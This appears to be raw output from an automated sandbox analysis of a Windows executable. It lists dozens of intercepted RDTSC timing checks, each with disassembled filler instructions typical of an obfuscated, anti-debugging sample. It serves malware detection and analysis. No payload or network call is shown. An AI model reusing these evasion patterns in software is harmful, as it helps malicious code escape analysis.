                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111BF1A second address: 111BF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC4h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111BF38 second address: 111BF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111A06D second address: 111A080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF30D194DBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111A49A second address: 111A4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF1h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111A4B3 second address: 111A4C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111A62F second address: 111A635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111ABE4 second address: 111AC04 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF30D194DB8h 0x00000012 js 00007FF30D194DBCh 0x00000018 jg 00007FF30D194DB6h 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111AC04 second address: 111AC10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FF30CF3CAE6h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111AC10 second address: 111AC36 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF30D194DB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF30D194DC7h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111AF44 second address: 111AF67 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF30CF3CAF3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 111AF67 second address: 111AF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C0C second address: 1119C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C12 second address: 1119C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C18 second address: 1119C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF30CF3CAEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007FF30CF3CAE6h 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C35 second address: 1119C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1119C39 second address: 1119C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11221A6 second address: 11221AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11221AA second address: 11221CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF30CF3CAEAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF30CF3CAF1h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 112233E second address: 112235C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF30D194DC7h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 112E212 second address: 112E226 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF30CF3CAEBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 112E226 second address: 112E24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF30D194DB6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jno 00007FF30D194DB6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF30D194DBFh 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1142DB0 second address: 1142DB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1142DB6 second address: 1142DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1145529 second address: 114552D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114552D second address: 1145531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1145531 second address: 1145541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF30CF3CAE6h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C312 second address: 114C32E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C32E second address: 114C334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C334 second address: 114C33F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF30D194DB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C33F second address: 114C34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C34E second address: 114C366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a jo 00007FF30D194DB6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C4B5 second address: 114C4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C4BB second address: 114C4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 114C4C0 second address: 114C4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAEDh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1150CF9 second address: 1150D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF30D194DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156634 second address: 115663A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 115663A second address: 1156646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156646 second address: 115664C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 115664C second address: 1156684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF30D194DC1h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF30D194DC6h 0x0000000f popad 0x00000010 pushad 0x00000011 ja 00007FF30D194DB6h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156684 second address: 1156691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156691 second address: 115669A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 115669A second address: 11566A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11566A0 second address: 11566A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11566A4 second address: 11566A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11566A8 second address: 11566BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FF30D194DB6h 0x00000010 jc 00007FF30D194DB6h 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11566BE second address: 11566C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11564D6 second address: 11564EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC0h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11564EA second address: 1156501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1156501 second address: 1156505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 115DBD4 second address: 115DBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF30CF3CAE6h 0x0000000a pop ecx 0x0000000b jmp 00007FF30CF3CAEFh 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 116F174 second address: 116F178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11720E5 second address: 1172109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF30CF3CAF7h 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1185743 second address: 118574B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118574B second address: 1185759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jl 00007FF30CF3CAE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11858EE second address: 118591D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF30D194DC1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF30D194DC5h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118591D second address: 1185923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1185D4F second address: 1185D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF30D194DBCh 0x0000000e jmp 00007FF30D194DBDh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1185D75 second address: 1185D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118603F second address: 1186043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1186043 second address: 1186049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1186186 second address: 11861AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF30D194DC1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF30D194DBDh 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11893B8 second address: 11893BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1189731 second address: 1189770 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF30D194DC3h 0x00000008 jmp 00007FF30D194DBDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FF30D194DBEh 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a pop edx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 jmp 00007FF30D194DBAh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1189770 second address: 1189774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1189774 second address: 1189795 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jmp 00007FF30D194DBBh 0x00000013 jnp 00007FF30D194DBCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118A95E second address: 118A964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 118E1F8 second address: 118E1FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A8726 second address: 10A872A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A872A second address: 10A872F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A872F second address: 10A8735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A076F second address: 53A0836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF30D194DC7h 0x00000009 xor ax, C87Eh 0x0000000e jmp 00007FF30D194DC9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF30D194DC0h 0x0000001a xor al, 00000078h 0x0000001d jmp 00007FF30D194DBBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FF30D194DC6h 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov eax, 7C096B6Dh 0x00000034 pushfd 0x00000035 jmp 00007FF30D194DBAh 0x0000003a and eax, 42270508h 0x00000040 jmp 00007FF30D194DBBh 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, ecx 0x00000048 pushad 0x00000049 movzx eax, bx 0x0000004c mov ecx, ebx 0x0000004e popad 0x0000004f push eax 0x00000050 jmp 00007FF30D194DBAh 0x00000055 xchg eax, ecx 0x00000056 pushad 0x00000057 jmp 00007FF30D194DBEh 0x0000005c mov ah, F2h 0x0000005e popad 0x0000005f push ebp 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0836 second address: 53A083A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A083A second address: 53A083E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A083E second address: 53A0844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0844 second address: 53A08CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 call 00007FF30D194DC9h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], esi 0x00000012 pushad 0x00000013 mov si, 9D1Fh 0x00000017 popad 0x00000018 lea eax, dword ptr [ebp-04h] 0x0000001b jmp 00007FF30D194DC2h 0x00000020 nop 0x00000021 pushad 0x00000022 call 00007FF30D194DBEh 0x00000027 call 00007FF30D194DC2h 0x0000002c pop esi 0x0000002d pop edi 0x0000002e movzx eax, bx 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FF30D194DBAh 0x00000038 nop 0x00000039 pushad 0x0000003a mov cl, D0h 0x0000003c popad 0x0000003d push dword ptr [ebp+08h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov di, 2BF4h 0x00000047 mov ebx, 0A071360h 0x0000004c popad 0x0000004d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0906 second address: 53A0926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007FF30CF3CAEBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e cmp dword ptr [ebp-04h], 00000000h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0926 second address: 53A092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A092C second address: 53A0930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0930 second address: 53A0948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF30D194DBCh 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0948 second address: 53A095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAEEh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A09A5 second address: 5390023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c jmp 00007FF30D194DBCh 0x00000011 mov bx, si 0x00000014 popad 0x00000015 pop esi 0x00000016 jmp 00007FF30D194DBCh 0x0000001b leave 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FF30D194DBEh 0x00000023 xor eax, 316A7648h 0x00000029 jmp 00007FF30D194DBBh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FF30D194DC8h 0x00000035 adc ecx, 74FEB8A8h 0x0000003b jmp 00007FF30D194DBBh 0x00000040 popfd 0x00000041 popad 0x00000042 retn 0004h 0x00000045 nop 0x00000046 sub esp, 04h 0x00000049 xor ebx, ebx 0x0000004b cmp eax, 00000000h 0x0000004e je 00007FF30D194F0Bh 0x00000054 mov dword ptr [esp], 0000000Dh 0x0000005b call 00007FF31164A0F5h 0x00000060 mov edi, edi 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 pushfd 0x00000066 jmp 00007FF30D194DBAh 0x0000006b add cl, FFFFFFF8h 0x0000006e jmp 00007FF30D194DBBh 0x00000073 popfd 0x00000074 movzx ecx, di 0x00000077 popad 0x00000078 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390023 second address: 5390043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ecx 0x0000000f mov cx, di 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390043 second address: 5390058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DC1h 0x00000009 rdtsc
